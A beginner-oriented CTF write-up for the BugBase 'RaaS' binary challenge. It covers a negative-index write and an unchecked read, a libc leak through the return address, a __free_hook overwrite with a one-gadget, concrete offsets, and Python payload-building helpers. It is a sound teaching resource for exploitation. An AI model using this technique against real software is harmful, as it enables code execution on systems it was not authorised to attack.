BugBase - RaaS
A beginner-friendly introduction to heap-related CTF challenges.
First of all, I don't usually post write-ups for CTF challenges because there's often an abundance of existing write-ups for the challenges I am capable of solving (i.e. the easiest ones).
However, after lots of CTFs in which I skipped every binary challenge that included a malloc and free, because I wouldn't even know what to do with the provided libc shared library, I finally decided during the BugBase CTF to take some time to learn about the heap and how to approach this sort of challenge.
In the end, I wasn't able to solve the challenge in time - and ironically, it isn't even a heap exploitation challenge - but I finally got around to learning the process of analysing this type of challenge.
And since that's something rarely found in any other writeup, I'll share all my steps here with the hope that it may prove useful to others.
Below you can find the challenge files (courtesy of the challenge author @J43G3R):
First things first, after running strings on the binary we'll simply execute it:
Well, that didn't print out a flag. Instead, it appears that we can enter some strings before being dropped into a typical menu that allows us to view, edit and delete those strings. Finally, we can also exit after entering another string and rating the service.
Okay, time to whip out our favourite decompiler or disassembler, whatever floats your boat, and statically analyse the code of this program. I'll be using Ghidra here.
This write-up does not focus on reverse engineering, so I'll only highlight the interesting bits and pieces - the rest is left as an exercise for the reader.
After renaming and retyping some of the variables in the code, we can start to make sense of the variables that are placed on the stack during the main function. Ghidra displays them like this:
Note that Ghidra uses the annotation Stack[-0x38] to indicate the location of a variable relative to the stack pointer right at the entry of the function. In this case, reviewPtrArray will be stored 56 (0x38) bytes below the stack pointer at the time of entering the main function. Keep in mind that the function starts by pushing the previous frame pointer onto the stack and then uses the new stack pointer value as the new frame pointer, so offsets relative to RBP differ by 8 from the ones Ghidra shows. This will be important later.
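To make the relationship between the two notations concrete, here is a minimal sketch in Python. It assumes the standard x86-64 prologue described above (push rbp, then mov rbp, rsp) and that Ghidra's Stack[0] refers to the slot holding the return address; the helper names are made up for illustration.

```python
def ghidra_to_rbp(stack_offset: int) -> int:
    """Convert a Ghidra Stack[offset] annotation to an RBP-relative offset.

    Assumption: Stack[0] is the return address slot and the prologue is
    `push rbp; mov rbp, rsp`, so RBP ends up 8 bytes below that slot.
    """
    return stack_offset + 8


def fmt(offset: int) -> str:
    """Render an RBP-relative offset the way a disassembler would."""
    sign = "-" if offset < 0 else "+"
    return f"RBP{sign}{abs(offset):#x}"


# reviewPtrArray is shown as Stack[-0x38] in Ghidra
print(fmt(ghidra_to_rbp(-0x38)))
```

Under these assumptions, the return address itself (Stack[0]) sits at RBP+0x8.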
Should any of this sound weird to you, feel free to check out my Buffer Overflow article where I explain the 32bit stack in more detail. Here we are on a 64 bit system but the concepts remain the same.
Not wasting any time, I have marked three variables that may be important to us: a string array that seems to store review pointers, a 32-character string that holds the product names, and a final string called storeName. They are contiguous on the stack, so should we be able to overflow one of them, we might control another.
Analyzing the first few lines, we find the loop that lets us add 4 reviews right at the start.
Okay, so the program dynamically allocates 48 bytes for each review and stores the 4 names (each at most 8 characters long) in the productNameArray, filling out the 32 bytes we saw.
Next, we look at what we can do with the menu options. Here, two of them stand out:
Looking at menu option 1 (view), we can see that no index check is performed before our input is used to calculate the address of the string that will be printed out (right side, red box).
Now, being able to read memory potentially allows us to read addresses that will later help us to defeat ASLR. So we'll definitely keep that option in mind.
Option 2 (edit) looks almost identical to option 1, except that here the index must be below 4 and, instead of reading from the calculated address, we can write to it (read(0,<address>,8) reads 8 bytes from stdin and writes them to <address>).
Notice how we can specify negative values for the reviewIndex? Since only the upper bound is checked, this enables us to write 8 arbitrary bytes to the memory below the productNameArray.
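A small Python model of that check shows which indices slip through and where they land. This is only a sketch: it assumes the index is handled as a signed 32-bit integer and that the only check is "index below 4", as the decompiled code suggests. The function name is hypothetical.

```python
import ctypes

SLOT_SIZE = 8   # each entry in productNameArray is 8 bytes
MAX_INDEX = 4   # the only check: index must be below 4


def edit_target_offset(raw_index: int):
    """Return the byte offset from productNameArray that option 2 writes to,
    or None if the upper-bound check rejects the index."""
    index = ctypes.c_int32(raw_index).value  # assumption: signed 32-bit int
    if index >= MAX_INDEX:
        return None
    return index * SLOT_SIZE


for i in (3, 4, -1, -2):
    print(i, edit_target_offset(i))
```

Index 4 is rejected, but -1 and -2 pass the check and resolve to offsets -8 and -16, i.e. memory below the array.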
Well, what about the adjacent pointer, storeName? We saw that it's right below the productNameArray, and if we pay attention to the last few lines of code, we can see that we can extend that write to any address we want:
If we were to use menu option 2 to overwrite the storeName with an address, we could later use the line in the red box to write 8 bytes to that address, effectively allowing us to write 8 bytes to any address we want.
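The two-step idea can be played through with a toy memory model in Python. Everything here is a stand-in: the addresses are invented, memory is just a dictionary, and the sketch assumes the storeName pointer sits exactly one slot (8 bytes) below productNameArray, which is how I read the stack layout.

```python
import struct

memory = {}  # address -> 8 bytes; a stand-in for process memory

PRODUCT_NAME_ARRAY = 0x1000                  # hypothetical stack address
STORE_NAME_SLOT = PRODUCT_NAME_ARRAY - 8     # assumed: pointer directly below
TARGET = 0x404040                            # hypothetical address to overwrite


def edit(index: int, data: bytes) -> None:
    """Menu option 2: write 8 bytes at productNameArray + index * 8."""
    if index >= 4:
        raise ValueError("index must be below 4")
    memory[PRODUCT_NAME_ARRAY + index * 8] = data


def final_read(data: bytes) -> None:
    """Final input: write 8 bytes to wherever storeName points."""
    pointer = struct.unpack("<Q", memory[STORE_NAME_SLOT])[0]
    memory[pointer] = data


edit(-1, struct.pack("<Q", TARGET))  # step 1: redirect storeName
final_read(b"AAAAAAAA")              # step 2: write through the pointer
print(hex(TARGET), memory[TARGET])
```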
Initially, this is where I would get stuck because I was unsure what I should write where and how I could turn any of that into RCE. Additionally, I hadn't even touched the libc shared library yet, so what's up with that? Let's get into that.
Alright, we've identified some flaws in the program - now let's get cracking. First of all, let's deal with the libc.so.6.
Whenever you write and compile a C program, chances are you're using some existing functions like printf. But you've never defined that function yourself, have you? That's because it's part of the C standard library, libc for short. This library is linked at runtime by the dynamic linker, which loads the library into memory so that the program can access the library functions.
As with every other program and library, there are different versions and implementations of libc out there. So when the challenge author hands out a specific C library, it's safe to assume that we'll need that exact libc version/implementation for our exploit.
When we simply execute the binary, it automatically links against our installed standard library. In terms of functionality, this won't make a difference: malloc (also a libc function) will always reserve memory and printf will always print a string. But internal implementations and addresses of functions may very well differ.
Enough with the theory, what do we do with the library?
First of all, in order to analyse the binary together with the right library, we'd have to patch the binary to use a dynamic linker whose version matches that of the library. Using strings, Google and patchelf, that could be achieved manually. Then we could set the environment variable LD_PRELOAD to the location of our custom library and finally execute the program. One example for that process would be this (otherwise unrelated) writeup.
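For reference, the manual route boils down to two commands. The following Python sketch only builds and prints them; it does not run anything. The file names (a copy of the binary called RaaS_manual and a loader called ld-linux-x86-64.so.2) are placeholders I picked for illustration, so substitute whatever matches your libc.

```python
import shlex


def manual_setup_commands(binary: str, loader: str, libc: str):
    """Build the two shell commands for the manual approach.

    1. patchelf --set-interpreter points the binary at a matching loader.
    2. LD_PRELOAD makes that loader pull in the provided libc first.
    """
    patch = shlex.join(["patchelf", "--set-interpreter", loader, binary])
    run = f"LD_PRELOAD={shlex.quote(libc)} {shlex.quote(binary)}"
    return patch, run


# Hypothetical file names; patchelf edits the file in place, so use a copy.
patch_cmd, run_cmd = manual_setup_commands(
    "./RaaS_manual", "./ld-linux-x86-64.so.2", "./libc.so.6"
)
print(patch_cmd)
print(run_cmd)
```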
Fortunately, we don't have to do these steps manually, as there's a tool that does all of that for us. However, I thought it may be good to know what that tool actually does.
Introducing pwninit:
Either download a release binary or build the tool from source and you are ready to go. Place the two challenge files into the same directory, and simply call pwninit.
Though pwninit comes with lots of options and flags, simply calling it in the directory with the libc library and the binary will do all the heavy lifting and create a new binary called RaaS_patched.
Now let's see what's different. When we execute the patched binary, everything looks the same. But if we look at the memory mappings for the patched binary, we can see that the custom libc is now being used instead of the default one.
Feel free to compare the output of the patched binary with the output of the original binary.
You may ask yourself why we would need to leak an address if /proc/<process pid>/maps shows all the addresses (we can see the heap, the libc and the stack). Try restarting the binary and viewing the memory mapping again - the addresses will change, which is the direct result of ASLR.
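If you want to pull the libc base out of such a mapping programmatically, a few lines of Python are enough. This is a sketch, not part of the original solution: the sample lines below are invented to show the format of the maps file (only the start address matches the gdb session later in this write-up), and the function name is my own.

```python
def libc_base_from_maps(maps_text: str, needle: str = "libc"):
    """Return the lowest start address of all mappings whose path
    contains `needle`, or None if there is no such mapping."""
    starts = []
    for line in maps_text.splitlines():
        fields = line.split(maxsplit=5)
        # Anonymous mappings have no path column and are skipped.
        if len(fields) < 6 or needle not in fields[5]:
            continue
        start = int(fields[0].split("-")[0], 16)
        starts.append(start)
    return min(starts) if starts else None


# Invented sample in the format of /proc/<pid>/maps
SAMPLE = """\
7ffff7dd5000-7ffff7df7000 r--p 00000000 08:01 1234 /home/user/raas/libc.so.6
7ffff7df7000-7ffff7f6f000 r-xp 00022000 08:01 1234 /home/user/raas/libc.so.6
7ffffffde000-7ffffffff000 rw-p 00000000 00:00 0 [stack]
"""

print(hex(libc_base_from_maps(SAMPLE)))
```

For a live process you would pass in the contents of /proc/<pid>/maps instead of the sample text.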
Okay fine, we have libc set up - what's next?
Since our final goal is remote code execution, we are looking for some way to redirect code execution and spawn a shell. However, we've seen that ASLR causes the address layout to be different each time, basically rendering hardcoded addresses useless.
If we could manage to extract any libc address from the program during runtime though, we could then simply work with offsets from that address to pinpoint gadgets and other useful locations in the library.
And that's exactly what we'll achieve with the vulnerability identified in the menu option 1. Quick recap, we can print a string value at any memory address from:
productNameArray + <input> * 8
If we remember Ghidra's variable output, we saw that productNameArray is at Stack[-0x58] (or directly in the assembler code: RBP-0x50). And if you know your C calling conventions, you'll remember which address is stored directly above the saved RBP: the return address of the current function.
The main function in C is actually called by another function called __libc_start_main which, as you may have guessed, is a libc function. Hence, the return address of main will be an address pointing to the next assembler instruction after the call from within libc.
So, productNameArray + 11 * 8 should print the return address (11*8 = 88 = 0x58).
We can leak the return address with menu option 1 and entering 11 for the index.
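The index arithmetic can be double-checked in Python. The sketch uses the RBP-relative offsets from above; the constant names are mine.

```python
SLOT_SIZE = 8
PRODUCT_NAME_ARRAY_RBP_OFFSET = -0x50  # productNameArray at RBP-0x50
RETURN_ADDRESS_RBP_OFFSET = 0x8        # return address at RBP+8

distance = RETURN_ADDRESS_RBP_OFFSET - PRODUCT_NAME_ARRAY_RBP_OFFSET
index, remainder = divmod(distance, SLOT_SIZE)

# The view option only reaches addresses that are a multiple of 8 away.
assert remainder == 0
print(hex(distance), index)
```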
We'll put together the exploit only in the end to save some time and space.
But how do we get the actual libc base address from only that address now? Let's use gdb.
First, we set a breakpoint in the main function and run the program. We hit the breakpoint immediately and look at the return address on the stack (RBP+8). That's the value we will leak with menu option 1 later. We can then ask gdb to disassemble the code at that address, and it turns out that we were right: the address does indeed belong to the function __libc_start_main.
Next, let's see the memory mapping of the program in gdb:
The libc is loaded into memory starting at address 0x7ffff7dd5000. The return address points to 0x7ffff7df9083. Therefore, subtracting the difference between the two from the leaked address will give us the current libc base address. The difference is 0x7ffff7df9083 - 0x7ffff7dd5000 = 0x24083.
The offset from the leaked address to the libc base is 0x24083.
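In an exploit script, this step could look roughly like the following Python sketch. It assumes the view option prints the value as a string, so the output stops at the first null byte and only the six non-zero bytes of the address come back. The function names are hypothetical, and the example bytes are simply the return address from the gdb session above in little-endian order.

```python
LEAK_OFFSET = 0x24083  # leaked return address minus libc base (see above)


def parse_leak(raw: bytes) -> int:
    """Turn the bytes printed by menu option 1 into an integer address.

    The two upper bytes of a userland address are zero and get cut off
    by string printing, so we pad back to 8 bytes before converting.
    """
    return int.from_bytes(raw[:8].ljust(8, b"\x00"), "little")


def libc_base_from_leak(leak: int) -> int:
    base = leak - LEAK_OFFSET
    # Sanity check: a library base is always page aligned.
    if base & 0xFFF:
        raise ValueError(f"suspicious libc base: {base:#x}")
    return base


raw = bytes.fromhex("8390dff7ff7f")  # 0x7ffff7df9083, little endian
leak = parse_leak(raw)
print(hex(leak), hex(libc_base_from_leak(leak)))
```

The page-alignment check is a cheap way to notice a wrong offset or a mangled leak early.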
Alright, we got the libc base address, what now?
__free_hook
As we've found out earlier, we can overwrite any address we want with 8 bytes.
One possible option is to overwrite a libc function hook. Basically, the libc version we're given provides several hooks that allow programmers to modify the behavior of existing functions. See this man page for more details. Note that these hooks are deprecated and no longer available in newer versions of libc.
One of these hooks is called __free_hook, a function pointer that is checked whenever free is called: if it is set, the function it points to is called instead. And free is exactly what gets called right before our program closes (free(storeName)).
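To illustrate why overwriting that pointer is so powerful, here is a toy model of the hook mechanism in Python. It is not glibc code, just the same idea in miniature: free first looks at a hook pointer and, if it is set, hands control to whatever it points to. All names are stand-ins.

```python
hooks = {"free": None}  # stands in for __free_hook, which is NULL by default
calls = []


def real_free(ptr: int) -> None:
    calls.append(("real_free", ptr))


def free(ptr: int) -> None:
    """Model of free(): if the hook is set, call it instead."""
    hook = hooks["free"]
    if hook is not None:
        hook(ptr)
        return
    real_free(ptr)


def one_gadget(ptr: int) -> None:
    # Stand-in for the code we want to reach.
    calls.append(("one_gadget", ptr))


free(0x1000)                # hook unset: normal behaviour
hooks["free"] = one_gadget  # the 8-byte overwrite
free(0x2000)                # hook set: control flow is redirected
print(calls)
```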
In gdb we can use print &__free_hook to print the address of that pointer.
Using the libc base address we determined, we can calculate the offset of __free_hook from the base with: 0x7ffff7fc3e48 - 0x7ffff7dd5000 = 0x1eee48.
The offset from the libc base to __free_hook is 0x1eee48.
On to the final part, what are we going to write to that address?
Introducing OneGadget. In essence, OneGadget allows us to find sequences of usable assembler instructions that will do all the work for us and spawn a shell. This is possible because the libc library may very well already contain code for this sort of action.
Once we have installed it, we can run it on our given library:
OneGadget will display the offsets from the libc base and also show the constraints for each gadget. So before we use one of them, let's see which ones have all of their constraints met.
For this purpose, we add a breakpoint right before the final free is executed and analyse the registers using gdb:
As we can see, r12 contains some value instead of NULL, meaning the constraints for the first gadget are not met. However, we fulfill the criteria for the other two gadgets, so let's try using the one-gadget with an offset of 0xe3b01.
Though 0xe3b04 appears to be a match as well, it did not work for me. So keep in mind to try different gadgets should the final shell fail (or dive deeper to reliably validate the constraints).
We've successfully identified a suitable one-gadget at offset 0xe3b01.
So the idea of our final exploit becomes:
1. Leak an address from the stack to calculate the libc base address
2. Overwrite a pointer on the stack to point to the __free_hook pointer
3. Use the final read operation to write the address of a one-gadget to the __free_hook pointer
4. When the final free is called, execution will continue at the one-gadget and spawn a shell
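The address arithmetic behind these steps fits into a few lines of Python. This sketch only covers the calculation and the two 8-byte payloads. It deliberately leaves out the menu interaction, and the function and key names are mine rather than taken from the actual exploit.

```python
import struct

LEAK_OFFSET = 0x24083        # leaked return address minus libc base
FREE_HOOK_OFFSET = 0x1EEE48  # __free_hook minus libc base
ONE_GADGET_OFFSET = 0xE3B01  # chosen one-gadget minus libc base


def build_payloads(leak: int) -> dict:
    """Derive all runtime addresses from the leak and pack the two writes."""
    libc_base = leak - LEAK_OFFSET
    free_hook = libc_base + FREE_HOOK_OFFSET
    one_gadget = libc_base + ONE_GADGET_OFFSET
    return {
        "libc_base": libc_base,
        # Written over storeName with menu option 2 (negative index)
        "store_name_overwrite": struct.pack("<Q", free_hook),
        # Written by the final read, which now targets __free_hook
        "final_write": struct.pack("<Q", one_gadget),
    }


# Example with the return address from the gdb session (no ASLR)
payloads = build_payloads(0x7FFFF7DF9083)
print(hex(payloads["libc_base"]))
print(payloads["store_name_overwrite"].hex())
print(payloads["final_write"].hex())
```

With pwntools, p64() would do the same job as struct.pack("<Q", ...) here.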
This writeup focused on setting up and analyzing a binary challenge with a custom libc version. Writing the exploit is now just a matter of stitching all the pieces together using Python and pwntools.
We've successfully exploited "Review as a Service" by leaking a libc address and overwriting the __free_hook, ultimately gaining RCE.
Alright, this concludes our journey into my first binary almost-heap challenge. In the end, we did not exploit the heap at all, but I believe that the knowledge gained during this challenge can easily be transferred to get started with other binary and actual heap challenges. The setup and analysis process remains mostly the same, and knowledge of libc is generally required in order to understand and exploit the heap.
If you want to learn about the heap, I can recommend the Azeria Labs articles, but as always there will be a lot of googling and stitching information together from various resources, such as my own heap layout infographic (shameless self plug).
Finally, I want to give a huge shoutout to the challenge author @J43G3R over at the BugBase discord, who supported me even after the CTF had ended by answering my questions and sharing his valuable knowledge!
If you got any feedback or questions, feel free to reach out via discord or smash one of the smiley faces below.